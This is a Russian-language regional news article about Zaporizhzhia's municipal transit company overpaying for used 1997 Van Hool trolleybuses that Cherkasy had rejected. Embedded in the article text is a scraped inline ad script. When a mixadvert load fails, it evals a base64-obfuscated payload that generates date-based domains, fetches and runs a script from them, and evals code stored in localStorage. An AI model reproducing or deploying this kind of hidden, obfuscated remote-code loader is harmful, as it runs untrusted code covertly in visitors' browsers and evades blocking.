В Черкассах отказались, а для Запорожья сгодится: что не так с купленными б/у троллейбусами «ЗЭТ» (ФОТО)

КП «Запорожэлектротранс» 29 июля сообщило о намерении заключить соглашение с ООО «Торговый дом» Литан «на поставку троллейбусов общей стоимостью 4870000 грн.

Информация об этом содержится в системе электронных закупок «Прозорро», передает «Наші Гроші.Запоріжжя».

Следовательно, фирма должна будет до конца текущего года поставить два троллейбуса Van Hool AG300T по цене 2440000 грн. Согласно требованиям они должны быть не старее 1997 года выпуска, с 45 сидячими местами, двумя кондиционерами и электрической системой отопления салона. Кроме этого, техника должна быть восстановлена ​​и полностью готовой к эксплуатации.

Конкурентом ООО «ТД» Литан «на тендере было ООО» Торговый дом УКВЗ-Украина» с предложением дорожен на 49 тыс. грн.

В 2019 году троллейбусы такой же модели 1997-1998-х годов производства и идентичной комплектацией ООО «Дуотранс» поставило «Запорожэлектротрансу» по цене 2050000 грн/ед. Сначала их заказали 9 единиц, но позже, из-за отсутствия финансирования, дополнительными соглашениями уменьшило поставку до 4 троллейбусов. В мае этого года ООО «ТД» Литан «выиграло тендер на поставку еще четырех троллейбусов этой модели уже по цене 2440000 грн.

Стоит отметить, что ООО «Дуотранс» принадлежит совладельцам ООО «ТД» Литан «- Олег Сухову и Дмитрию Науменко.

Поставленный в Запорожье троллейбус во время эксплуатации в ЕС

Уже после поставки троллейбусов по прошлогоднему соглашению и после выхода на маршруты, на транспортных форумах опубликовали подробные данные троллейбусов с VIN-кодами. Так, часть этих троллейбусов завезли в Украину еще в 2017 году. Троллейбусы 1997 года выпуска к растаможиванию стоил ООО «ТД» Литан 14,5 тыс. долларов, а уже с растаможкой — 21,4 тыс. долларов США — около 560 тыс. грн по тогдашнему курсу.

В 2018 году два таких троллейбуса для ООО «ТД» Литан «стоили уже 15,8 тыс. долл. США на границе и 22,6 тыс. долларов после растаможки, что составляло около 595 тыс. грн после растаможки.

По информации «НашіГроші. Запоріжжя «, поставщиком троллейбусов для «Литан «выступила голландская компания» Womy Equipment Supply «, которая и специализируется на продаже спецтехники, в том числе бывшей в использовании.

После прошлогодней сделки сообщалось, ранее троллейбусы эксплуатировались в нидерландском городе Арнем с 1997-1998 годов до 2013 года, после чего они были выведены из эксплуатации. В 2017 году все 9 троллейбусов были выкуплены и доставлены в город Днепр, где они ожидали покупателя. При этом в Европе в последнее эксплуатантом в течение 2012-2017 годов указывается компания Hermes Eindhoven, которая обслуживает маршруты в том числе в Арнеме. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

В 2015-2016 годах «Womy Equipment Supply» пыталась продать 9 троллейбусов этой модели из города Арнем в литовский город Каунас. Предварительной цене тамошнее профильное медиа указывало 35-40 тысяч евро, что составляет около 1,1-1,3 млн грн по тогдашнему курсу. Впрочем, троллейбусы не купили из-за несоответствия технических требований (в первую очередь год выпуска). Также в компании было недостаточно таких троллейбусов: всего 9 из необходимых 12. Тогда же СМИ сообщили, что после неудачи в Литве «Womy Equipment Supply» начала договариваться о поставке этих троллейбусов в Украину.

После того, как троллейбусы оказались в Украине возможность их купить рассматривали также в Черкассах. Весной 2019 комиссия КП «Черкассыэлектротранс» посетила Днепр для ознакомления с троллейбусами. Согласно акту осмотра техники, троллейбусы прошли только косметический ремонт и частичное ТО, элементная база статического и тягового преобразователей была устаревшей с уже истекшим сроком эксплуатации и т.д. Также кабина водителя не соответствовала нормам ДСТУ 4905: 2008 (отсутствует перегородка с дверью между кабиной водителя и салоном, которая их отделяет).

Кроме этого, руководитель КП — Петр Кучер — в комментарии изданию сообщил, что кроме неудовлетворительного состояния техники, причиной отказа от закупки Van Hool AG300T от «ТД» Литан «также было то, что их рыночная стоимость составляет около 700 тыс. грн , а предприятию навязывали закупить указанные троллейбусы по 2050000 грн.

Ко всему этому следует добавить наблюдения «Акцента», которое нивелирует еще один «плюс» этих троллебусов. Конционеры в Van Holl не охлаждают воздух, а работают больше как вентиляторы, что с учетом высокой температуры воздуха и отсутствии форточек в машине делают тяжелым и некомфортным пребывание в салоне в жару.

В жару эти троллейбусы в полном составе не выезжают. В дневное время в июле, когда было наиболее жарко, удалось увидеть всего один троллейбус-гармошку. Однако, удивляться этому не стоит. Ведь по информации «Акцента» водители и кондукторы очень не любят эти троллейбусы.

«Это самые страшные машины. В них даже форточек нет. Работать в них в жару невозможно… ехать пассажирам также. Кондиционеры… Ну … еле дышат они, гоняя только горячий воздух», — рассказали нам на предприятии.

Отметим, 19 июня, когда городской глава Запорожья Владимир Буряк сообщал о скорой покупке этих троллейбусов, он посчитал этот транспорт «современным».

Для справки. На сегодняшний день в Запорожье уже курсирует 6 таких троллейбусов. С покупкой по этому тендеру их количество возрастет до 8. (adsbygoogle = window.adsbygoogle || []).push({});

Оконные блоки троллейбуса не имеют форточекконцидионер в троллейбусе Van Holl по сути работает как вентилятор Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-cherkassah-otkazalis-a-dlya-zaporozhya-sgoditsya-chto-ne-tak-s-kuplennymi-b-u-trollejbusami-zet-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top